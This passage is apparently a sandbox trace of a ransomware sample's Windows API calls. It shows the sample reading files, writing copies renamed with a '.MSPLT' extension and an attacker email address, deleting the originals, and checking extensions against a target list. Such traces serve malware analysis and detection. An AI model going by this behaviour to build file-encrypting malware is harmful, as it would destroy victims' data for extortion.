lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x241, lpOverlapped=0x0) returned 1 [0169.017] WriteFile (in: hFile=0x2f4, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x250, lpOverlapped=0x0) returned 1 [0169.018] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.019] WriteFile (in: hFile=0x2f4, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x104, lpOverlapped=0x0) returned 1 [0169.019] SetEndOfFile (hFile=0x2f4) returned 1 [0169.019] CloseHandle (hObject=0x2f4) returned 1 [0169.021] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.021] SetEndOfFile (hFile=0x2fc) returned 1 [0169.022] CloseHandle (hObject=0x2fc) returned 1 [0169.022] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0169.022] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 1 [0169.023] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.023] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.023] lstrlenW (lpString=".doc") returned 4 [0169.023] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0169.023] lstrlenW (lpString=".docx") returned 5 [0169.023] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0169.023] lstrlenW (lpString=".pdf") returned 4 [0169.023] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0169.023] lstrlenW (lpString=".xls") returned 4 [0169.023] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0169.023] lstrlenW (lpString=".xlsx") returned 5 [0169.023] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0169.023] lstrlenW (lpString=".ppt") returned 4 [0169.023] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0169.023] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.023] lstrlenW (lpString=".zip") returned 4 [0169.023] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0169.023] lstrlenW (lpString=".rar") returned 4 [0169.023] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0169.023] lstrlenW (lpString=".bz2") returned 4 [0169.023] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0169.023] lstrlenW (lpString=".7z") returned 3 [0169.023] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0169.023] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.024] lstrlenW (lpString=".dbf") returned 4 [0169.024] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.024] lstrlenW (lpString=".1cd") returned 4 [0169.024] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0169.024] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.024] lstrlenW (lpString=".jpg") returned 4 [0169.024] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.024] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.024] lstrlenW (lpString=".doc") returned 4 [0169.024] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString=".docx") returned 5 [0169.024] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0169.024] lstrlenW (lpString=".pdf") returned 4 [0169.024] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString=".xls") returned 4 [0169.024] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString=".xlsx") returned 5 [0169.024] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0169.024] lstrlenW (lpString=".ppt") returned 4 [0169.024] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.024] lstrlenW (lpString=".zip") returned 4 [0169.024] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0169.024] lstrlenW (lpString=".rar") returned 4 [0169.024] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0169.025] lstrlenW (lpString=".bz2") returned 4 [0169.025] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0169.025] lstrlenW (lpString=".7z") returned 3 [0169.025] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0169.025] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.025] lstrlenW (lpString=".dbf") returned 4 [0169.025] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0169.025] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.025] lstrlenW (lpString=".1cd") returned 4 [0169.025] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0169.025] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0169.025] lstrlenW (lpString=".jpg") returned 4 [0169.025] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0169.026] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.026] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.026] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0169.027] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=17240) returned 1 [0169.027] CloseHandle (hObject=0x2fc) returned 1 [0169.027] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 0x80 [0169.027] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0169.027] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.027] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0169.028] GetLastError () returned 0x0 [0169.028] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x4358, lpOverlapped=0x0) returned 1 [0169.098] WriteFile (in: hFile=0x2f4, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x4360, lpOverlapped=0x0) returned 1 [0169.099] ReadFile (in: hFile=0x2fc, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.099] WriteFile (in: hFile=0x2f4, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0169.100] SetEndOfFile (hFile=0x2f4) returned 1 [0169.100] CloseHandle (hObject=0x2f4) returned 1 [0169.102] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.102] SetEndOfFile (hFile=0x2fc) returned 1 [0169.103] CloseHandle (hObject=0x2fc) returned 1 [0169.103] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.103] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 1 [0169.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.104] lstrlenW (lpString=".doc") returned 4 [0169.104] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.104] lstrlenW (lpString=".docx") returned 5 [0169.104] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.104] lstrlenW (lpString=".pdf") returned 4 [0169.104] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.104] lstrlenW (lpString=".xls") returned 4 [0169.104] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.104] lstrlenW (lpString=".xlsx") returned 5 [0169.104] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.104] lstrlenW (lpString=".ppt") returned 4 [0169.104] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.104] lstrlenW (lpString=".zip") returned 4 [0169.104] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.104] lstrlenW (lpString=".rar") returned 4 [0169.104] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.104] lstrlenW (lpString=".bz2") returned 4 [0169.104] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.104] lstrlenW (lpString=".7z") returned 3 [0169.104] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.105] lstrlenW (lpString=".dbf") returned 4 [0169.105] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.105] lstrlenW (lpString=".1cd") returned 4 [0169.105] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.105] lstrlenW (lpString=".jpg") returned 4 [0169.105] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.105] lstrlenW (lpString=".doc") returned 4 [0169.105] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.105] lstrlenW (lpString=".docx") returned 5 [0169.105] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.105] lstrlenW (lpString=".pdf") returned 4 [0169.105] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.105] lstrlenW (lpString=".xls") returned 4 [0169.105] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.105] lstrlenW (lpString=".xlsx") returned 5 [0169.105] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.105] lstrlenW (lpString=".ppt") returned 4 [0169.105] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.105] lstrlenW (lpString=".zip") returned 4 [0169.105] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.105] lstrlenW (lpString=".rar") returned 4 [0169.106] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.106] lstrlenW (lpString=".bz2") returned 4 [0169.106] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.106] lstrlenW (lpString=".7z") returned 3 [0169.106] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.106] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.106] lstrlenW (lpString=".dbf") returned 4 [0169.106] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.106] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.106] lstrlenW (lpString=".1cd") returned 4 [0169.106] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.106] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0169.106] lstrlenW (lpString=".jpg") returned 4 [0169.106] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.106] Sleep (dwMilliseconds=0x64) [0169.744] Sleep (dwMilliseconds=0x64) [0170.246] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0170.246] lstrlenW (lpString="SetupResources.dll") returned 18 [0170.247] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0170.481] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=18776) returned 1 [0170.481] CloseHandle (hObject=0x2f8) returned 1 [0170.481] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 0x80 [0170.481] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0170.484] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.484] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0170.484] GetLastError () returned 0x0 [0170.484] ReadFile (in: hFile=0x2e8, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x4958, lpOverlapped=0x0) returned 1 [0170.509] WriteFile (in: hFile=0x304, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x4960, lpOverlapped=0x0) returned 1 [0170.511] ReadFile (in: hFile=0x2e8, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0170.511] WriteFile (in: hFile=0x304, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0170.511] SetEndOfFile (hFile=0x304) returned 1 [0170.511] CloseHandle (hObject=0x304) returned 1 [0170.516] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.516] SetEndOfFile (hFile=0x2e8) returned 1 [0170.518] CloseHandle (hObject=0x2e8) returned 1 [0170.518] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.518] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 1 [0170.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.519] lstrlenW (lpString=".doc") returned 4 [0170.519] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.519] lstrlenW (lpString=".docx") returned 5 [0170.519] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.519] lstrlenW (lpString=".pdf") returned 4 [0170.519] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.519] lstrlenW (lpString=".xls") returned 4 [0170.519] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.519] lstrlenW (lpString=".xlsx") returned 5 [0170.519] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.519] lstrlenW (lpString=".ppt") returned 4 [0170.519] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.519] lstrlenW (lpString=".zip") returned 4 [0170.519] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.519] lstrlenW (lpString=".rar") returned 4 [0170.519] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.519] lstrlenW (lpString=".bz2") returned 4 [0170.519] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.519] lstrlenW (lpString=".7z") returned 3 [0170.519] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.519] lstrlenW (lpString=".dbf") returned 4 [0170.519] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.520] lstrlenW (lpString=".1cd") returned 4 [0170.520] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.520] lstrlenW (lpString=".jpg") returned 4 [0170.520] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.520] lstrlenW (lpString=".doc") returned 4 [0170.520] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.520] lstrlenW (lpString=".docx") returned 5 [0170.520] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.520] lstrlenW (lpString=".pdf") returned 4 [0170.520] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.520] lstrlenW (lpString=".xls") returned 4 [0170.520] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.520] lstrlenW (lpString=".xlsx") returned 5 [0170.520] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.520] lstrlenW (lpString=".ppt") returned 4 [0170.520] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.520] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.520] lstrlenW (lpString=".zip") returned 4 [0170.520] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.520] lstrlenW (lpString=".rar") returned 4 [0170.520] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.521] lstrlenW (lpString=".bz2") returned 4 [0170.521] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.521] lstrlenW (lpString=".7z") returned 3 [0170.521] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.521] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.521] lstrlenW (lpString=".dbf") returned 4 [0170.521] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.521] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.521] lstrlenW (lpString=".1cd") returned 4 [0170.521] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.521] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0170.521] lstrlenW (lpString=".jpg") returned 4 [0170.521] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.521] Sleep (dwMilliseconds=0x64) [0171.076] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.076] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.076] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0171.182] GetFileSizeEx (in: hFile=0x35c, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=16728) returned 1 [0171.182] CloseHandle (hObject=0x35c) returned 1 [0171.183] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 0x80 [0171.183] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.183] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0171.183] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.183] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.183] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0171.184] GetLastError () returned 0x0 [0171.184] ReadFile (in: hFile=0x35c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x4158, lpOverlapped=0x0) returned 1 [0171.302] WriteFile (in: hFile=0x360, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x4160, lpOverlapped=0x0) returned 1 [0171.304] ReadFile (in: hFile=0x35c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.304] WriteFile (in: hFile=0x360, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.304] SetEndOfFile (hFile=0x360) returned 1 [0171.305] CloseHandle (hObject=0x360) returned 1 [0171.306] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.307] SetEndOfFile (hFile=0x35c) returned 1 [0171.308] CloseHandle (hObject=0x35c) returned 1 [0171.308] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.308] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 1 [0171.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.309] lstrlenW (lpString=".doc") returned 4 [0171.309] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.309] lstrlenW (lpString=".docx") returned 5 [0171.309] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.309] lstrlenW (lpString=".pdf") returned 4 [0171.309] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.309] lstrlenW (lpString=".xls") returned 4 [0171.309] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.309] lstrlenW (lpString=".xlsx") returned 5 [0171.309] lstrcmpiW 